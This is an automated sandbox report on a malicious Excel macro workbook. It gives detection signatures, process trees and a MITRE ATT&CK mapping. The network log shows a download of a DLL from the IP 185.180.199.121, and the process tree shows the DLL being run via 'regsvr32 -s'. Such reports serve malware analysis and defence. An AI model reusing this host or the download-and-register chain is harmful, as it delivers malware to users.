Play interactive tourEdit tour

Analysis Report Total_order_data-V2434883.xlsb

Overview

General Information

 Sample Name: Total_order_data-V2434883.xlsb Analysis ID: 432263 MD5: 3ee5986d7978a5f2df982fce2a3ebf93 SHA1: 8f0e54b80cb391871d3cd1de6dd190ea686f0798 SHA256: a0a165ea7db4685fb5677e3bc17c6d9ade7224dca824d9de930355f1c40ee0a2 Infos: Most interesting Screenshot:

Detection

Hidden Macro 4.0
 Score: 80 Range: 0 - 100 Whitelisted: false Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Classification

 System is w10x64EXCEL.EXE (PID: 3292 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)regsvr32.exe (PID: 5852 cmdline: regsvr32 -s ..\kdldyeff.dll MD5: 426E7499F6A7346F0410DEAD0805586B)cmd.exe (PID: 5964 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)cleanup

Malware Configuration

No configs have been found
SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

Sigma Overview

System Summary:

 Sigma detected: Microsoft Office Product Spawning Windows Shell Show sources
 Source: Process started Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\kdldyeff.dll, CommandLine: regsvr32 -s ..\kdldyeff.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3292, ProcessCommandLine: regsvr32 -s ..\kdldyeff.dll, ProcessId: 5852

Signature Overview

 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 2.2.regsvr32.exe.970000.2.unpack Avira: Label: TR/Dropper.Gen Source: 2.2.regsvr32.exe.8340f0.1.unpack Avira: Label: TR/Patched.Ren.Gen
 Uses new MSVCR Dlls Show sources

Software Vulnerabilities:

 Document exploit detected (creates forbidden files) Show sources
 Document exploit detected (drops PE files) Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: sat1_0609_2[1].dll.0.dr Jump to dropped file
 Document exploit detected (process start blacklist hit) Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe
 Potential document exploit detected (performs HTTP gets) Show sources
 Source: global traffic TCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80
 Potential document exploit detected (unknown TCP traffic) Show sources
 Source: global traffic TCP traffic: 192.168.2.3:49719 -> 185.180.199.121:80
 Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 09 Jun 2021 21:54:41 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 20:56:10 GMTETag: "803e0-5c45b81110e80"Accept-Ranges: bytesContent-Length: 525280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de a0 b9 12 9a c1 d7 41 9a c1 d7 41 9a c1 d7 41 cc de c4 41 bf c1 d7 41 9a c1 d7 41 a2 c1 d7 41 f8 de c4 41 89 c1 d7 41 9a c1 d6 41 53 c0 d7 41 19 dd d9 41 81 c1 d7 41 72 de dd 41 16 c1 d7 41 22 c7 d1 41 9b c1 d7 41 72 de dc 41 c7 c1 d7 41 72 de d3 41 9b c1 d7 41 52 69 63 68 9a c1 d7 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 93 84 74 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 40 02 00 00 d0 05 00 00 00 00 00 d9 bd 00 00 00 10 00 00 00 50 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 10 00 00 64 dd 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 db 02 00 55 00 00 00 b8 c0 02 00 f0 00 00 00 00 50 03 00 b8 69 04 00 00 00 00 00 00 00 00 00 00 e0 07 00 e0 23 00 00 00 c0 07 00 b8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 37 02 00 00 10 00 00 00 40 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b5 8b 00 00 00 50 02 00 00 90 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e8 63 00 00 00 e0 02 00 00 30 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 69 04 00 00 50 03 00 00 70 04 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d2 5f 00 00 00 c0 07 00 00 60 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive
 Connects to IPs without corresponding DNS lookups Show sources
 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121 Source: unknown TCP traffic detected without corresponding DNS query: 185.180.199.121
 Source: global traffic HTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive
 URLs found in memory or binary data Show sources

System Summary:

 Found Excel 4.0 Macro with suspicious formulas Show sources
 Source: Total_order_data-V2434883.xlsb Initial sample: CALL Source: Total_order_data-V2434883.xlsb Initial sample: CALL Source: Total_order_data-V2434883.xlsb Initial sample: EXEC
 Office process drops PE file Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll Jump to dropped file
 Abnormal high CPU Usage Show sources
 Source: C:\Windows\SysWOW64\regsvr32.exe Process Stats: CPU usage > 98%
 Tries to load missing DLLs Show sources
 Classification label Show sources
 Source: classification engine Classification label: mal80.expl.evad.winXLSB@5/10@0/1
 Creates files inside the user directory Show sources
 Creates temporary files Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\{40B4E29A-81E2-4785-950C-FD213AB7F011} - OProcSessId.dat Jump to behavior
 Spawns processes Show sources
 Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll Jump to behavior Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe Jump to behavior
 Found graphical window changes (likely an installer) Show sources
 Source: Window Recorder Window detected: More than 3 window changes detected
 Document is a ZIP file with path names indicative of goodware Show sources
 Source: Total_order_data-V2434883.xlsb Initial sample: OLE zip file path = xl/media/image1.png Source: Total_order_data-V2434883.xlsb Initial sample: OLE zip file path = xl/media/image2.png Source: Total_order_data-V2434883.xlsb Initial sample: OLE zip file path = xl/media/image3.png Source: Total_order_data-V2434883.xlsb Initial sample: OLE zip file path = xl/media/image4.png Source: Total_order_data-V2434883.xlsb Initial sample: OLE zip file path = xl/media/image5.png
 Checks if Microsoft Office is installed Show sources
 Uses new MSVCR Dlls Show sources
 Registers a DLL Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
 Uses code obfuscation techniques (call, push, ret) Show sources
 Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_00E02AF0 push dword ptr [edx+14h]; ret 2_2_00E02BFD
 Drops PE files Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll Jump to dropped file Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll Jump to dropped file
 Drops PE files to the user directory Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll Jump to dropped file

Boot Survival:

 Drops PE files to the user root directory Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE File created: C:\Users\user\kdldyeff.dll Jump to dropped file
 Disables application error messsages (SetErrorMode) Show sources
 Found dropped PE file which has not been started or loaded Show sources
 Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll Jump to dropped file
 Contains functionality to read the PEB Show sources
 Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_01170456 mov eax, dword ptr fs:[00000030h] 2_2_01170456 Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0117095E mov eax, dword ptr fs:[00000030h] 2_2_0117095E
 Creates a process in suspended mode (likely to inject code) Show sources
 Yara detected Xls With Macro 4.0 Show sources
 Source: Yara match File source: app.xml, type: SAMPLE

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1DLL Side-Loading1Process Injection11Masquerading111OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution42Boot or Logon Initialization ScriptsDLL Side-Loading1Process Injection11LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol21Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Hide Legend

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi